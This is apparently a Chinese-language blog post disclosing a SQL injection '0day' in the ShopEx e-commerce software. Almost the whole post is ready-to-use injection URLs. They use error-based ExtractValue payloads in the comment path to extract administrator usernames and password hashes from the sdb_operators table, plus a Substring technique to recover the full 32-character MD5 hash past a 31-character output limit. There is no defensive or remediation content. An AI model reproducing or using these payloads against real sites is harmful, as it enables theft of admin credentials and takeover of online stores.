shopex注入0day

爆用户名 http://fuck.0day5.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/username/**/from/**/sdb_operators/**/limit/**/1,1)))/**/order/**/by/**/’1-ask-commentlist.html http://fuck.0day5.com/index.php?comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/username/**/from/**/sdb_operators/**/limit/**/1,1)))/**/order/**/by/**/’1-ask-commentlist.html 密码 http://fuck.0day5.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/userpass/**/from/**/sdb_operators/**/limit/**/1,1)))/**/order/**/by/**/’1-ask-commentlist.html http://fuck.0day5.com/index.php?comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/userpass/**/from/**/sdb_operators/**/limit/**/1,1)))/**/order/**/by/**/’1-ask-commentlist.html 解决shopex注入解决只能显示31个字符的问题 加个 Substring函数ok 比如 /comment-8967%27/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/concat(userpass)/**/from/**/sdb_operators/**/limit/**/0,1)))/**/order/**/by/**/%271-ask-commentlist.htmland 只显示了31个字符 得到用户名密码 63afc8decff291355f9363312dd407e 32位MD5-减去已知的31位就是 1 然后 这样 最后1位数就出来了 //comment-8967%27/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/Substring(concat(userpass),32,32)/**/from/**/sdb_operators/**/limit/**/0,1)))/**/order/**/by/**/%271-ask-commentlist.htmland 第32位就出来了 得到2 加上前面的得到 63afc8decff291355f9363312dd407e2

发表评论